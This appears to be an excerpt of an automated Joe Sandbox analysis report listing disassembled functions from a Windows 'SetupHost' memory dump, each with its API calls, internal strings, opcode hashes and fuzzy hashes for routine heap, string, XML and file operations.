                                                                                                                                                                                                                • String ID: (DestinationMaximumLength == 0) || (DestinationBuffer != 0)$DestinationMaximumLength >= SourceLength$Not-null check failed: Destination$Not-null check failed: Source$RtlCopyLBlob$RtlIsLBlobValid(Source)$onecore\base\lstring\lblob.cpp
                                                                                                                                                                                                                • API String ID: 0-2860070937
                                                                                                                                                                                                                • Opcode ID: e3fab23f311e10036db3cb33e7f27b516169e89cbe8c48fe5af9f9565e80c6b3
                                                                                                                                                                                                                • Instruction ID: c0aebb0bbf380dce4c480f21adc5860095ec44568129e392e6fd33fb5a92de95
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3fab23f311e10036db3cb33e7f27b516169e89cbe8c48fe5af9f9565e80c6b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B1160B1841708EBEF20DF44D548BAEBBF4EB80718F22C95EE4162B340D3B58A49DB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009EC467
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,000000FF,00000000,00000000), ref: 009EC471
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,?,000000FF,00000000,00000000), ref: 009EC485
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,000000FF,00000000,00000000), ref: 009EC48C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,000000FF,00000000,00000000), ref: 009EC4D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$AllocByteCharMultiProcessWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2516516997-0
                                                                                                                                                                                                                • Opcode ID: f1943022100f238a86b5066a382b18c590a739e54058339cc25c0a59f6922c21
                                                                                                                                                                                                                • Instruction ID: 82e639bb0ab9eb187c99f66587af4b1e7a54d03751bc17aa2684113d3fd77b14
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1943022100f238a86b5066a382b18c590a739e54058339cc25c0a59f6922c21
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D01173B2648211BBE7159BE69C0DFFF7A6CFB487A1F108619F545D22E0FAB08C034660
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlRaiseStatus.NTDLL(C00000E5,00000000,00000328,00001B30,00001B30,00000C2C,?,00000005,?,?,00000000,?,?), ref: 009D47B2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMicrodomBuilder::StartElement, xrefs: 009D47E9
                                                                                                                                                                                                                • NewAttribute = this->AllocateStreamObject(), xrefs: 009D4A07
                                                                                                                                                                                                                • CloserElement = this->AllocateStreamObject(), xrefs: 009D4A41
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D47DE
                                                                                                                                                                                                                • NewElement = this->AllocateStreamObject(), xrefs: 009D47D2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RaiseStatus
                                                                                                                                                                                                                • String ID: CMicrodomBuilder::StartElement$CloserElement = this->AllocateStreamObject()$NewAttribute = this->AllocateStreamObject()$NewElement = this->AllocateStreamObject()$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 3012540672-11414109
                                                                                                                                                                                                                • Opcode ID: 6340f508f14c95f80c55175d8c08a7241dbfdc0f9e1588fb4990adef63dc977f
                                                                                                                                                                                                                • Instruction ID: e95346176f858a594153862336c13dcddaa71c8b6c1319e3616d60f16caa26ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6340f508f14c95f80c55175d8c08a7241dbfdc0f9e1588fb4990adef63dc977f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A128B5A40606DFCB14CF69C580AAABBF8FF48304B14C56AE919DB341E730E955CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __aullrem.LIBCMT ref: 009D4AB7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000005C,009DDFB2,00000000,?,00000000,00000000,?,?,00001830,00000C2C,?,?,00000000,00000328,00001B30), ref: 009D4B67
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000005,?,?,00000000,?,?), ref: 009D4B6E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • DefaultAttribute.Allocate(), xrefs: 009D4C5F
                                                                                                                                                                                                                • CMicrodomBuilder::InsertDefaultAttributes, xrefs: 009D4C83
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D4C7C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess__aullrem
                                                                                                                                                                                                                • String ID: CMicrodomBuilder::InsertDefaultAttributes$DefaultAttribute.Allocate()$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 240158341-1428742198
                                                                                                                                                                                                                • Opcode ID: 560eaf069a7613fccdb3d611e26e8938fa41ee8d4b5465f87e3307b9c78607d8
                                                                                                                                                                                                                • Instruction ID: 89c1fe2a7bc637d39de1e2faaae699a5098277822d0b0123693047b432a1a640
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 560eaf069a7613fccdb3d611e26e8938fa41ee8d4b5465f87e3307b9c78607d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8461AB75A51202DFDB28CF68C580AAABBF4FF08304F24C5AAD45A9B351D771ED42CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E74BB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 009E74D7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E74DE
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000), ref: 009E74E9
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,C0010000,00000007,00000000,00000002,48000100,00000000), ref: 009E751C
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E75AB
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009E75F4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$CreateFileFreeProcessUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1793555658-0
                                                                                                                                                                                                                • Opcode ID: bb80aedd8f86cc1e83bfbc5ac27fc150d44da2b544bb0cebec91fed844bc068d
                                                                                                                                                                                                                • Instruction ID: 0293d0cf6f658e67aa9c9be46df430540e18c88ecb53ddea3cb52c4d2a993c78
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb80aedd8f86cc1e83bfbc5ac27fc150d44da2b544bb0cebec91fed844bc068d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71519871A042459FDB15DFF9C885A6EBBB6FF88310B148568F815D7294EB30DC01CB61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00100000,00000000,00000000,00000000), ref: 009E4AAE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E4AB5
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E4BB6
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E4BC4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000570,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E4BF2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E4BFD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E4C04
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Error$ProcessStatus$AllocFreeLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1546159109-0
                                                                                                                                                                                                                • Opcode ID: c84f9aeb03cc6e9386f6be5d62fa3eef98332341738e3422694dbdcafdcc03de
                                                                                                                                                                                                                • Instruction ID: a1081e5bab2fb97faa5af028d5e148493151d65b82f88104f90553e996a156d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c84f9aeb03cc6e9386f6be5d62fa3eef98332341738e3422694dbdcafdcc03de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B515D71E042599BDF16DFAAD884BEEBBBABF88311F194029F801A7250DB34DC01CB54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,?), ref: 00A0C65C
                                                                                                                                                                                                                  • Part of subcall function 00A0CB48: HeapFree.KERNEL32(?,00000000,?), ref: 00A0CB5C
                                                                                                                                                                                                                  • Part of subcall function 00A0CB48: GetProcessHeap.KERNEL32(?,00000000,?,00A0C67C), ref: 00A0CB6B
                                                                                                                                                                                                                • _wtoi.MSVCRT ref: 00A0C73A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000002), ref: 00A0C773
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A0C77A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A0C7B9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0C7C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 00A0C7DB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Alloc_wtoi
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1973661499-0
                                                                                                                                                                                                                • Opcode ID: db8c99b68f8266b70d7e849e1c4f9127dbb2ac598a2577b56a0ec11fc9649323
                                                                                                                                                                                                                • Instruction ID: 7699c971627334160cc94b934acd024d2e1a3e8ab13e12215609cb612b336e6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db8c99b68f8266b70d7e849e1c4f9127dbb2ac598a2577b56a0ec11fc9649323
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2751D136D1021EABCF21EBE8E885BBEB6B4AF04771F10471AE401E72D0CB7489448F95
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(000000DF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009E1284), ref: 009E109A
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 009E10E6
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,000980C8,?,00000010,00000000,00000000,?,009E1284), ref: 009E1140
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,009E1284,?), ref: 009E114C
                                                                                                                                                                                                                • GetOverlappedResult.KERNEL32(?,009E1284,?,00000001), ref: 009E1165
                                                                                                                                                                                                                • SetFileInformationByHandle.KERNEL32(?,00000006,?,00000008), ref: 009E1195
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001), ref: 009E11AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorLastPointer$ControlDeviceHandleInformationOverlappedResult
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3873607931-0
                                                                                                                                                                                                                • Opcode ID: 4697515d33b8f0100277acfef98b51a381306a1a82568269624b42b30c0381c7
                                                                                                                                                                                                                • Instruction ID: 326b4087ad85671674e75bdbdd5d5f945973ed16b906f59e40b6d145a8f4f281
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4697515d33b8f0100277acfef98b51a381306a1a82568269624b42b30c0381c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E414D71A44249AFDB15CF95DC81BEEBBF9FB48711F144429E905E7240DB709D418B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E55C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000), ref: 009E5625
                                                                                                                                                                                                                  • Part of subcall function 009EA4C7: GetProcessHeap.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA51A
                                                                                                                                                                                                                  • Part of subcall function 009EA4C7: HeapAlloc.KERNEL32(00000000,?,?,009DDD7D,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009EA521
                                                                                                                                                                                                                  • Part of subcall function 009EA4C7: SetLastError.KERNEL32(00000000,000001D6,80070216,00000000,00000000,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA5BE
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009E321A
                                                                                                                                                                                                                  • Part of subcall function 009E6824: memset.MSVCRT ref: 009E6875
                                                                                                                                                                                                                  • Part of subcall function 009E6824: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009E691F
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000002,?,00000000,?,?,-00000030,?,?,?,?,?,?,?,00000000,00000000), ref: 009E326E
                                                                                                                                                                                                                  • Part of subcall function 009E1984: SetLastError.KERNEL32(00000006,00000000,009DE32B,?,00000000), ref: 009E19AC
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E32AC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E32B7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,009DDD7D,?,00000000), ref: 009E32C8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E32CF
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,009DDD7D,?,00000000), ref: 009E32DA
                                                                                                                                                                                                                  • Part of subcall function 009EA5C8: GetProcessHeap.KERNEL32(00000000,00000000,?,009E3202,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000), ref: 009EA62E
                                                                                                                                                                                                                  • Part of subcall function 009EA5C8: HeapFree.KERNEL32(00000000,?,009E3202), ref: 009EA635
                                                                                                                                                                                                                  • Part of subcall function 009EA5C8: SetLastError.KERNEL32(00000000,?,009E3202,?,?,00000000,00000000,?,00000000,?,?,009DDD7D,?,00000000,00000000,00000000), ref: 009EA640
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$Process$FileFree$AllocCloseCreateHandleSizememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 383526647-0
                                                                                                                                                                                                                • Opcode ID: 641b8bc01f7157cecb350a3d3315f30549f14e87373f0749fd3578bbb5435c72
                                                                                                                                                                                                                • Instruction ID: 382d874534ff176416c73fcf6987cc535afda36d90b22979304d4871026bc056
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 641b8bc01f7157cecb350a3d3315f30549f14e87373f0749fd3578bbb5435c72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E741C731B006856BDB17ABF6C84ABBEB6BAAFC4710F008529F55297391DF308E028654
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E6B0F
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,0A000000,00000000), ref: 009E6B4A
                                                                                                                                                                                                                  • Part of subcall function 009E6824: memset.MSVCRT ref: 009E6875
                                                                                                                                                                                                                  • Part of subcall function 009E6824: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009E691F
                                                                                                                                                                                                                  • Part of subcall function 009E1A24: SetLastError.KERNEL32(00000006,00000000,009DE351,?,?,00000000), ref: 009E1A7C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000), ref: 009E6BCE
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E6BDC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 009E6BEC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E6BF3
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 009E6BFE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heapmemset$CloseCreateFileFreeHandleProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2137095822-0
                                                                                                                                                                                                                • Opcode ID: b43b84ff07a266b64b5aa25588819d40c5ef5454008a854c7fb1bae5ef459d85
                                                                                                                                                                                                                • Instruction ID: 65402c8938a3fdb3431177ab68e80cd8212c129a91830e3eaa46178c14cea1df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b43b84ff07a266b64b5aa25588819d40c5ef5454008a854c7fb1bae5ef459d85
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E310571B002849BDB26EBB68C89FAE7B79EFC4750F184119F512EB2C4DE709C06C650
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 009BC512
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                  • Part of subcall function 00A08732: HeapAlloc.KERNEL32(0000065B,00000000,00000000,00000002,00000000,0000000B), ref: 00A08781
                                                                                                                                                                                                                  • Part of subcall function 00A08732: memset.MSVCRT ref: 00A08791
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocH_prolog3_Heap_vsnwprintfmemset
                                                                                                                                                                                                                • String ID: %d.%d.%d.%d$%s;AppVer=%d.%d.%d.%d$AppVer=%d.%d.%d.%d$CMoSetupOneSettingsHelperT<class CEmptyType>::AddSettingsAppVer$appver
                                                                                                                                                                                                                • API String ID: 1736508944-976788147
                                                                                                                                                                                                                • Opcode ID: 8d60de8c6f2a0a60e7e87e410598d3885253e2ea8985d7bea46607c162d3e80a
                                                                                                                                                                                                                • Instruction ID: 7945831c883c90233f4f67366f15472e3140e55550c7ed38902de715d80fc2e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d60de8c6f2a0a60e7e87e410598d3885253e2ea8985d7bea46607c162d3e80a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82310675A40209ABCF15AE94CA42FEE7B76AFC8720F148418FD096F385DBB5E811DB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\lstring\lutf8_string.cpp, xrefs: 009DAAC1
                                                                                                                                                                                                                • ::RtlIsLUtf8StringValid(&Sources[i]), xrefs: 009DAA8C
                                                                                                                                                                                                                • RtlConcatenateLUtf8Strings, xrefs: 009DAAC8
                                                                                                                                                                                                                • BUCL::Rtl::AddInPlaceWithOverflowCheck(&MaximumLength, Sources[i].Length), xrefs: 009DAAA1
                                                                                                                                                                                                                • Not-null check failed: Destination, xrefs: 009DAAB1
                                                                                                                                                                                                                • (SourceCount == 0) || (Sources != 0), xrefs: 009DA9EA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: (SourceCount == 0) || (Sources != 0)$::RtlIsLUtf8StringValid(&Sources[i])$BUCL::Rtl::AddInPlaceWithOverflowCheck(&MaximumLength, Sources[i].Length)$Not-null check failed: Destination$RtlConcatenateLUtf8Strings$onecore\base\lstring\lutf8_string.cpp
                                                                                                                                                                                                                • API String ID: 3510742995-255235288
                                                                                                                                                                                                                • Opcode ID: 0eff507c7f649fe6c558c2dfbbddcebff8ceafac5b612c64f10c6edadbd4663c
                                                                                                                                                                                                                • Instruction ID: 5912a9d86bce9922f382bbbbc7510ec4b00a0ca6b56db629407d7c49752320b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eff507c7f649fe6c558c2dfbbddcebff8ceafac5b612c64f10c6edadbd4663c
